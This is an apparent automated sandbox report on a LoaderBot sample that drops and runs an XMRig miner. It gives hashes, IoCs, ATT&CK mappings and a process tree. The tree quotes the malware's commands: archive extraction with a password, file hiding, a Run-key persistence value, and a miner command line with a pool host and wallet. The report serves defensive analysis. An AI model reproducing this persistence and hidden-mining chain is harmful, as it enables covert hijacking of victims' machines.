loaderbot | 7fd525394f449871ea7be96a66ddc1ff6cb498aaaee85549cae392a782670780

Analysis

max time kernel
40s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20240412-en
resource tags

arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
submitted
12-04-2024 17:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

4.2MB
MD5

b7250436469d05b646b54b00ccb74d7e
SHA1

7ad840124e69004c862d0cf3f722b00cbfbbb9d3
SHA256

7fd525394f449871ea7be96a66ddc1ff6cb498aaaee85549cae392a782670780
SHA512

599e2a873b14b461c628ef3fb3f9771e11d866ff16012e82fbd614267e4eab268abd0671ad6bca6bcc8a5808e94b5aa1dcbb7ba75c51e78a645f040d60732ba4
SSDEEP

98304:tt5Uqm7J/F8CAXFSubtgfzlM87bnHzNLhs5rugOyMhKGiDy7:ttw7JrAVRclM87bnTNTgOywUy7

Score

10^/10

loaderbot xmrig loader miner persistence

Malware Config

Signatures

LoaderBot
LoaderBot is a loader written in .NET downloading and executing miners.
loader miner loaderbot
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

LoaderBot executable 2 IoCs

resource	yara_rule
behavioral2/files/0x0007000000023410-34.dat	loaderbot
behavioral2/memory/2896-38-0x0000000000B40000-0x0000000000F3E000-memory.dmp	loaderbot

XMRig Miner payload 15 IoCs

miner

resource	yara_rule
behavioral2/memory/3432-55-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/2364-59-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/2364-60-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/2364-67-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/2364-68-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/2364-69-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/2364-73-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/2364-75-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/2364-76-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/2364-77-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/2364-78-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/2364-79-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/2364-80-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/2364-81-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/2364-82-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-776854024-226333264-2052258302-1000\Control Panel\International\Geo\Nation	Installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-776854024-226333264-2052258302-1000\Control Panel\International\Geo\Nation	file.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url	Installer.exe

Executes dropped EXE 6 IoCs

pid	Process
1600	7z.exe
952	7z.exe
4756	7z.exe
2896	Installer.exe
3432	Driver.exe
2364	Driver.exe

Loads dropped DLL 3 IoCs

pid	Process
1600	7z.exe
952	7z.exe
4756	7z.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-776854024-226333264-2052258302-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\Installer.exe"	Installer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe
2896	Installer.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
656	Process not Found

Suspicious use of AdjustPrivilegeToken 17 IoCs

description	pid	Process
Token: SeRestorePrivilege	1600	7z.exe
Token: 35	1600	7z.exe
Token: SeSecurityPrivilege	1600	7z.exe
Token: SeSecurityPrivilege	1600	7z.exe
Token: SeRestorePrivilege	952	7z.exe
Token: 35	952	7z.exe
Token: SeSecurityPrivilege	952	7z.exe
Token: SeSecurityPrivilege	952	7z.exe
Token: SeRestorePrivilege	4756	7z.exe
Token: 35	4756	7z.exe
Token: SeSecurityPrivilege	4756	7z.exe
Token: SeSecurityPrivilege	4756	7z.exe
Token: SeDebugPrivilege	2896	Installer.exe
Token: SeLockMemoryPrivilege	3432	Driver.exe
Token: SeLockMemoryPrivilege	3432	Driver.exe
Token: SeLockMemoryPrivilege	2364	Driver.exe
Token: SeLockMemoryPrivilege	2364	Driver.exe

Suspicious use of WriteProcessMemory 19 IoCs

description	pid	Process	procid_target
PID 4968 wrote to memory of 1368	4968	file.exe	87
PID 4968 wrote to memory of 1368	4968	file.exe	87
PID 1368 wrote to memory of 5028	1368	cmd.exe	89
PID 1368 wrote to memory of 5028	1368	cmd.exe	89
PID 1368 wrote to memory of 1600	1368	cmd.exe	90
PID 1368 wrote to memory of 1600	1368	cmd.exe	90
PID 1368 wrote to memory of 952	1368	cmd.exe	91
PID 1368 wrote to memory of 952	1368	cmd.exe	91
PID 1368 wrote to memory of 4756	1368	cmd.exe	92
PID 1368 wrote to memory of 4756	1368	cmd.exe	92
PID 1368 wrote to memory of 4916	1368	cmd.exe	93
PID 1368 wrote to memory of 4916	1368	cmd.exe	93
PID 1368 wrote to memory of 2896	1368	cmd.exe	94
PID 1368 wrote to memory of 2896	1368	cmd.exe	94
PID 1368 wrote to memory of 2896	1368	cmd.exe	94
PID 2896 wrote to memory of 3432	2896	Installer.exe	96
PID 2896 wrote to memory of 3432	2896	Installer.exe	96
PID 2896 wrote to memory of 2364	2896	Installer.exe	100
PID 2896 wrote to memory of 2364	2896	Installer.exe	100

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4916	attrib.exe

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1368
- - C:\Windows\system32\mode.com
    mode 65,10
    3⤵
    PID:5028
- - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
    7z.exe e file.zip -p12151210907486279731870130990 -oextracted
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    PID:1600
- - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
    7z.exe e extracted/file_2.zip -oextracted
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    PID:952
- - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
    7z.exe e extracted/file_1.zip -oextracted
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    PID:4756
- - C:\Windows\system32\attrib.exe
    attrib +H "Installer.exe"
    3⤵
    - Views/modifies file attributes
    PID:4916
- - C:\Users\Admin\AppData\Local\Temp\main\Installer.exe
    "Installer.exe"
    3⤵
    - Checks computer location settings
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2896
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:3432
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:2364

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\main\7z.dll

Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\7z.exe

Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\ANTIAV~1.DAT

Filesize
2.2MB

MD5
d39425a0656846d077a08d88c3a1eafd

SHA1
11543c91ae879a1ee2218989da8b607db8b6ce83

SHA256
d07755415a96e885071720b882f91484be8f00dd14d0c04f294f759425eeeeb3

SHA512
20b395b137d8fee88d57e02158e5dfb840d0d5b969332c95d6f3d39f9dec7833e2198eea9bbe144da3ec62850aa1efe622ca4b0fa743285381591ccc2c2e24dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\Installer.exe

Filesize
4.0MB

MD5
38f702eca36f4991a2ca55a61e72cb2d

SHA1
854064e8d9d3724b9913f3ba47628bad8d150268

SHA256
b9057ff1f55c599ee6b322de47cad13dc8d74b63a5a322faf565a610846cca6a

SHA512
de46d99091ae5e7df2cd6d89d3a38bdd4d7e1bbb55526d123e97a83d7966e91b910040d637af4aac500bb266cbad464947bebc0789b6c66102d50837d100a480

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_1.zip

Filesize
1.7MB

MD5
e28fd981b387bbb881349af3aed72a14

SHA1
ccc7321776b8258fae70a199721a2c94b31a0dbd

SHA256
c424d7cac793cfbee144add7c081146d6395eb082d85ff2239f923488b36c784

SHA512
8af8463a82b7f8cc2bcd47e10d630ad88a1aefa177ca3f444bcfa440eddeb5946468858846ea09fb863a6994caa0baf41bc80b1099d47a38da6f03b60e1510b7

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_2.zip

Filesize
3.3MB

MD5
f818b9273775a3e36a2cec53d77d92aa

SHA1
1f9a69bc57779cc2ffc5055779f19a89b0590899

SHA256
8261f8f25a906439b6a8c87abb58eae50b10f642295559a7cf7563e4584e5bd8

SHA512
133fcad998f9f90960e33df7720f35be3ed3fbbba0058ec9ee5c563e8645225f14430fd4b3e503cecd40627701a1600335bcd184b6de133ca092303ab2c5cc1a

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\file.bin

Filesize
3.3MB

MD5
b4f16494a066087384577934692b7dc0

SHA1
7324629c7bf5a4c39def42892f6297d6fa01aa89

SHA256
0cc20065191fd1d64ac99fea586277e1dcb883adf403fc4228deecb9f5d91099

SHA512
905c161f897e177ee1951ed25a5b2eb1f77093306bacdebec0d9b7c703f4aec814f5da332525d135bea0df9f52705998e8ced6f81262f1689bdc6fc1dc99b0af

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\main.bat

Filesize
475B

MD5
854e13db0bbb65f40103fd9109e52253

SHA1
d6e56d1751641e68527b001d3d946bdc7423297c

SHA256
9c6a028767dd856c4aebb824f845f5e53c90b9568c22d87076bda6aa798f31e3

SHA512
728a8b7e5a44323606215dc085543408f33decbcc85649f0955730ab82626e184ac4dd2a2a7b085616aca9320cafecbe1c0d88c9d615222c6d264c03afa30dd0

Download Submit
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

Filesize
3.9MB

MD5
02569a7a91a71133d4a1023bf32aa6f4

SHA1
0f16bcb3f3f085d3d3be912195558e9f9680d574

SHA256
8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

SHA512
534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

Download Submit
memory/2364-72-0x0000000002150000-0x0000000002170000-memory.dmp

Filesize
128KB

Download
memory/2364-73-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2364-82-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2364-81-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2364-80-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2364-79-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2364-78-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2364-58-0x0000000001FD0000-0x0000000001FF0000-memory.dmp

Filesize
128KB

Download
memory/2364-59-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2364-60-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2364-77-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2364-62-0x0000000001FF0000-0x0000000002010000-memory.dmp

Filesize
128KB

Download
memory/2364-63-0x0000000002130000-0x0000000002150000-memory.dmp

Filesize
128KB

Download
memory/2364-64-0x0000000002150000-0x0000000002170000-memory.dmp

Filesize
128KB

Download
memory/2364-66-0x0000000002170000-0x0000000002190000-memory.dmp

Filesize
128KB

Download
memory/2364-76-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2364-67-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2364-68-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2364-69-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2364-70-0x0000000001FF0000-0x0000000002010000-memory.dmp

Filesize
128KB

Download
memory/2364-71-0x0000000002130000-0x0000000002150000-memory.dmp

Filesize
128KB

Download
memory/2364-75-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2364-74-0x0000000002170000-0x0000000002190000-memory.dmp

Filesize
128KB

Download
memory/2896-41-0x0000000005CC0000-0x0000000005D26000-memory.dmp

Filesize
408KB

Download
memory/2896-37-0x00000000736F0000-0x0000000073EA0000-memory.dmp

Filesize
7.7MB

Download
memory/2896-65-0x0000000005A40000-0x0000000005A50000-memory.dmp

Filesize
64KB

Download
memory/2896-61-0x00000000736F0000-0x0000000073EA0000-memory.dmp

Filesize
7.7MB

Download
memory/2896-38-0x0000000000B40000-0x0000000000F3E000-memory.dmp

Filesize
4.0MB

Download
memory/2896-42-0x0000000005A40000-0x0000000005A50000-memory.dmp

Filesize
64KB

Download
memory/3432-55-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/3432-54-0x0000000000440000-0x0000000000454000-memory.dmp

Filesize
80KB

Download
memory/3432-53-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download